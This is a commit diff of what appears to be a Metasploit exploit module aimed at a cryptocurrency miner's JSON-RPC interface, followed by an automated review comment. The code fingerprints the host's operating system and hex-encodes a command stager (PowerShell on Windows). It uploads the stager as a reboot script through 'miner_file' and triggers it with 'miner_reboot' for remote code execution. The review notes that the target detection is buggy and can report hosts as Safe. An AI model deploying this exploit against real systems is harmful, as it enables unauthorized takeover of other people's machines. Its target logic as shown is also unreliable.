refactor: universal check, payload platform check

GSoC/Meterpreter_Web_Console
phra 2018-06-27 17:11:47 +02:00
parent e9db949418
commit 53f158ef4f
No known key found for this signature in database
GPG Key ID: 91FF93D1B85D76B5
1 changed files with 85 additions and 57 deletions


@ -33,16 +33,19 @@ class MetasploitModule < Msf::Exploit::Remote
'Platform' => ['win', 'linux'],
'Targets' =>
[
[ 'Automatic Target', { 'auto' => true }],
[ 'Linux',
{
'Platform' => 'linux',
'Arch' => ARCH_X64
'Arch' => ARCH_X64,
'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf' ]
}
],
[ 'Windows',
{
'Platform' => 'windows',
'Arch' => ARCH_X64
'Arch' => ARCH_X64,
'CmdStagerFlavor' => [ 'certutil', 'vbs' ]
}
]
],
@ -60,66 +63,34 @@ class MetasploitModule < Msf::Exploit::Remote
deregister_options('URIPATH', 'SSL', 'SSLCert', 'SRVPORT', 'SRVHOST')
end
def execute_command(cmd, opts = {})
case target['Platform']
when 'linux'
cmd = Rex::Text.to_hex(cmd, '')
when 'windows'
cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '')
end
case target['Platform']
when 'linux'
upload = {
def select_target
data = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_file',
"params" => ['reboot.bash', "#{cmd}"]
}.to_json
when 'windows'
upload = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_file',
"params" => ['reboot.bat', "#{cmd}"]
}.to_json
end
begin
connect
sock.put(upload)
buf = sock.get_once || ''
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
print_error(e)
ensure
disconnect
end
trigger_vulnerability
end
def trigger_vulnerability
execute = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_reboot'
"method" => 'miner_getfile',
"params" => ['config.txt']
}.to_json
connect
sock.put(execute)
sock.put(data)
buf = sock.get_once || ''
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
print_error(e)
ensure
disconnect
end
def exploit
case target['Platform']
when 'linux'
execute_cmdstager
when 'windows'
execute_cmdstager(linemax: 20000)
tmp = StringIO.new
tmp << buf
tmp2 = tmp.string
hex = ''
if tmp2.scan(/\w+/)[5]
return self.targets[1]
elsif tmp2.scan(/\w+/)[7]
return self.targets[2]
else
return nil
end
end
def check
target = select_target
if target.nil?
return Exploit::CheckCode::Safe
end
data = {
"id" => 0,
"jsonrpc" => '2.0',
@ -139,9 +110,6 @@ class MetasploitModule < Msf::Exploit::Remote
when 'windows'
hex = tmp2.scan(/\w+/)[7]
end
if not hex
return Exploit::CheckCode::Safe
end
str = Rex::Text.hex_to_raw(hex)
if str.include?('WARNING')
return Exploit::CheckCode::Vulnerable
@ -149,9 +117,69 @@ class MetasploitModule < Msf::Exploit::Remote
return Exploit::CheckCode::Detected
end
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
vprint_error(e)
vprint_error(e.message)
return Exploit::CheckCode::Unknown
ensure
disconnect
end
def execute_command(cmd, opts = {})
target = select_target
case target['Platform']
when 'linux'
cmd = Rex::Text.to_hex(cmd, '')
upload = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_file',
"params" => ['reboot.bash', "#{cmd}"]
}.to_json
when 'windows'
cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '')
upload = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_file',
"params" => ['reboot.bat', "#{cmd}"]
}.to_json
end
connect
sock.put(upload)
buf = sock.get_once || ''
trigger_vulnerability
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
fail_with(Failure::UnexpectedReply, e.message)
ensure
disconnect
end
def trigger_vulnerability
execute = {
"id" => 0,
"jsonrpc" => '2.0',
"method" => 'miner_reboot'
}.to_json
connect
sock.put(execute)
buf = sock.get_once || ''
disconnect
end
def exploit
target = select_target
if target.nil?
fail_with(Exploit::Failure::NoTarget, 'No matching target')
end
if (target['Platform'].eql?('linux') && payload_instance.name !~ /linux/i) ||
(target['Platform'].eql?('windows') && payload_instance.name !~ /windows/i)
fail_with Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{target.name}'"
end
case target['Platform']
when 'linux'
execute_cmdstager(flavor: :echo, linemax: 100000)
when 'windows'
execute_cmdstager(flavor: :vbs, linemax: 100000)
end
end
end
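Review bot: In the new `select_target`, the `elsif tmp2.scan(/\w+/)[7]` branch can never be taken, because any reply with an eighth word token also has a sixth, so `if tmp2.scan(/\w+/)[5]` matches first and every parseable reply is classified as `self.targets[1]` (Linux). `check`, whose body continues outside the visible hunks, appears to pick its token index from that platform, so a Windows host would be read at the wrong index and could get a misleading verdict. Testing the longer index first fixes the ordering: `tokens = buf.scan(/\w+/)`, then `if tokens[7]` before `elsif tokens[5]`. Separately, `check` returns `Exploit::CheckCode::Safe` when `select_target` yields nil, which includes an empty reply from `sock.get_once || ''`. `return Exploit::CheckCode::Unknown if target.nil?` would avoid reporting an unparsed host as safe.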